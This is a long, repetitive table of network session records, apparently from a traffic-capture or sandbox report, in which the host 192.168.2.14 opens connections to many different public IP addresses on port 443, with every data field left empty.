                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14327192.168.2.1435482102.13.166.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14328192.168.2.143972062.70.59.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14329192.168.2.1436156194.20.124.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14330192.168.2.1459320149.99.29.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14331192.168.2.1445370100.149.135.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14332192.168.2.1458904171.168.205.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14333192.168.2.144020477.253.198.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14334192.168.2.14537441.12.214.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14335192.168.2.1440696144.77.82.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14336192.168.2.1443330112.14.180.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14337192.168.2.143412639.123.108.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14338192.168.2.1446878111.117.226.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14339192.168.2.14338141.168.205.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14340192.168.2.145888270.81.57.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14341192.168.2.1444984109.74.48.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14342192.168.2.1456434209.45.247.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14343192.168.2.1455274107.144.19.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14344192.168.2.1446312126.118.244.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14345192.168.2.1447864201.230.137.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14346192.168.2.143408846.44.86.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14347192.168.2.1440448184.184.252.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14348192.168.2.1456850101.186.220.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14349192.168.2.145106850.203.9.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14350192.168.2.1436764164.225.75.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14351192.168.2.143841648.218.30.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14352192.168.2.1458906105.37.33.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14353192.168.2.145190875.86.187.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14354192.168.2.145540019.221.17.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14355192.168.2.145932852.77.244.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14356192.168.2.1452150209.182.161.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14357192.168.2.1453778103.49.134.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14358192.168.2.144969495.102.180.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14359192.168.2.1442884122.163.207.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14360192.168.2.1445740212.229.202.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14361192.168.2.1437566167.33.232.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14362192.168.2.1437476125.152.77.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14363192.168.2.1435396191.165.221.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14364192.168.2.1437992186.221.71.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14365192.168.2.1439892188.77.233.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14366192.168.2.1435926151.100.72.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14367192.168.2.1458936147.29.201.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14368192.168.2.143473280.17.254.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14369192.168.2.1457552153.4.185.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14370192.168.2.143702237.72.210.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14371192.168.2.145002237.193.170.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14372192.168.2.1441490208.196.138.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14373192.168.2.14395441.136.65.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14374192.168.2.145692843.113.13.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14375192.168.2.1452452183.148.79.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14376192.168.2.1440220165.45.48.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14377192.168.2.1433298160.186.175.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14378192.168.2.1458480162.54.144.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14379192.168.2.1456330133.167.223.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14380192.168.2.1449350213.220.38.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14381192.168.2.1445518191.38.27.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14382192.168.2.1453376218.144.48.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14383192.168.2.144032840.28.208.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14384192.168.2.144279690.95.42.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14385192.168.2.1450688129.169.181.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14386192.168.2.145480882.15.214.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14387192.168.2.145718648.233.218.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14388192.168.2.144728673.101.157.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14389192.168.2.1438462115.147.42.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14390192.168.2.146022297.114.224.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14391192.168.2.1459520103.183.17.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14392192.168.2.1447804166.141.74.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14393192.168.2.1433468180.168.146.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14394192.168.2.144371251.121.55.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14395192.168.2.143321250.33.69.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14396192.168.2.1445242201.29.208.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14397192.168.2.145034068.73.129.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14398192.168.2.1439436208.97.227.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14399192.168.2.1446832222.45.246.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14400192.168.2.145782669.254.62.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14401192.168.2.1453838161.93.194.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14402192.168.2.1451100179.46.248.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14403192.168.2.1432808197.35.216.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14404192.168.2.145413090.66.23.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14405192.168.2.146035420.78.229.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14406192.168.2.1443686120.136.19.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14407192.168.2.1444370103.253.174.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14408192.168.2.145590280.16.118.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14409192.168.2.145304619.64.109.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14410192.168.2.1449516173.190.125.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14411192.168.2.144554436.152.207.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14412192.168.2.1433100143.9.24.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14413192.168.2.1433100204.227.32.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14414192.168.2.1459594126.121.219.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14415192.168.2.144083093.213.18.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14416192.168.2.143543044.63.38.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14417192.168.2.1444318220.136.62.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14418192.168.2.145208834.50.231.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14419192.168.2.144570013.153.115.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14420192.168.2.143561249.119.185.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14421192.168.2.1456608159.193.170.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14422192.168.2.143336472.172.158.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14423192.168.2.1458588148.4.144.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14424192.168.2.145076224.33.171.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14425192.168.2.1443272190.64.23.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14426192.168.2.1439332105.200.32.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14427192.168.2.14524184.26.193.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14428192.168.2.1433380128.90.90.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14429192.168.2.1432786105.48.252.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14430192.168.2.1435114176.206.71.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14431192.168.2.1447404158.13.171.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14432192.168.2.144127872.121.172.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14433192.168.2.1459978126.122.164.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14434192.168.2.1457352189.99.98.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14435192.168.2.145846294.56.191.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14436192.168.2.145843631.120.209.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14437192.168.2.1449836199.229.45.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14438192.168.2.1434104119.59.174.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14439192.168.2.143807220.26.63.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14440192.168.2.1442740157.169.249.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14441192.168.2.14370365.63.246.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14442192.168.2.145476243.128.228.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14443192.168.2.1455586193.144.55.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14444192.168.2.1441156182.55.144.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14445192.168.2.1448948171.22.202.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14446192.168.2.1454456145.125.51.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14447192.168.2.145407087.62.83.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14448192.168.2.144183077.169.69.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14449192.168.2.1459230197.170.242.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14450192.168.2.144341835.198.79.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14451192.168.2.1456242149.149.105.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14452192.168.2.144314659.60.72.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14453192.168.2.1444908171.178.132.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14454192.168.2.143459645.231.66.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14455192.168.2.146070414.195.232.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14456192.168.2.1443594175.83.116.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14457192.168.2.144293896.242.146.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14458192.168.2.143821458.96.35.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14459192.168.2.145178444.157.60.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14460192.168.2.145210238.212.117.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14461192.168.2.144817888.11.71.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14462192.168.2.1442166135.15.194.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14463192.168.2.144730643.201.109.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14464192.168.2.145986278.81.145.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14465192.168.2.145529892.183.123.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14466192.168.2.144857024.5.101.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14467192.168.2.145168489.44.32.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14468192.168.2.144135891.228.206.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14469192.168.2.1457748130.4.168.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14470192.168.2.1448584169.105.250.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14471192.168.2.1456220198.241.67.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14472192.168.2.1451342207.94.15.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14473192.168.2.143326458.68.71.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14474192.168.2.143946472.15.184.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14475192.168.2.144610024.177.126.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14476192.168.2.144621653.67.62.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14477192.168.2.145187843.177.227.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14478192.168.2.1432848143.157.60.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14479192.168.2.1456360212.107.248.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14480192.168.2.145369260.93.16.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14481192.168.2.1433642166.14.24.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14482192.168.2.144920670.50.102.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14483192.168.2.1439022107.148.244.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14484192.168.2.143835851.179.130.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14485192.168.2.1450806210.251.200.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14486192.168.2.1453028181.129.157.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14487192.168.2.1455816131.153.5.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14488192.168.2.144518620.31.196.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14489192.168.2.1448286210.58.100.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14490192.168.2.1450226201.185.240.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14491192.168.2.143436043.135.73.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14492192.168.2.1446084210.67.160.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14493192.168.2.1434190154.209.88.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14494192.168.2.145849697.88.243.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14495192.168.2.1436992195.15.235.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14496192.168.2.1451046183.207.136.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14497192.168.2.1439602131.77.110.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14498192.168.2.1449596129.133.61.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14499192.168.2.1456238139.123.214.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14500192.168.2.1437442121.64.56.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14501192.168.2.1451976210.143.200.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14502192.168.2.14519429.105.90.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14503192.168.2.1457022199.127.67.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14504192.168.2.1454246177.177.130.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14505192.168.2.1460676146.151.237.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14506192.168.2.145313834.163.187.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14507192.168.2.1455836144.80.21.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14508192.168.2.1452216128.56.135.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14509192.168.2.1441834207.48.209.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14510192.168.2.1455718217.159.103.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14511192.168.2.1450130179.203.24.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14512192.168.2.1450852219.2.207.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14513192.168.2.1454260181.96.151.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14514192.168.2.145245060.62.185.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14515192.168.2.14395241.198.93.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14516192.168.2.1460774160.221.229.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14517192.168.2.1459620200.37.146.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14518192.168.2.1444942209.121.113.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14519192.168.2.1450070121.238.135.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14520192.168.2.145475290.200.199.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14521192.168.2.144992078.201.179.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14522192.168.2.1454536185.207.212.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14523192.168.2.1435018162.144.117.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14524192.168.2.145726459.240.210.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14525192.168.2.1444170160.29.144.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14526192.168.2.144737498.16.244.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14527192.168.2.143820885.184.14.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14528192.168.2.144746065.24.54.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14529192.168.2.1445572133.48.8.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14530192.168.2.1450498141.230.96.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14531192.168.2.1443826109.225.110.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14532192.168.2.1432836152.221.69.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14533192.168.2.1454566167.37.252.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14534192.168.2.1452394140.240.197.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14535192.168.2.145481669.203.232.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14536192.168.2.1437066181.125.0.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14537192.168.2.144182260.155.34.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14538192.168.2.144201486.67.95.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14539192.168.2.1443348148.146.141.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14540192.168.2.145431697.128.81.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14541192.168.2.1456414209.214.32.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14542192.168.2.1440946123.182.12.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14543192.168.2.1438340200.137.127.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14544192.168.2.1439286162.141.169.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14545192.168.2.145119053.59.66.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14546192.168.2.144530813.155.56.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14547192.168.2.1439456125.17.24.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14548192.168.2.144327836.203.221.102443
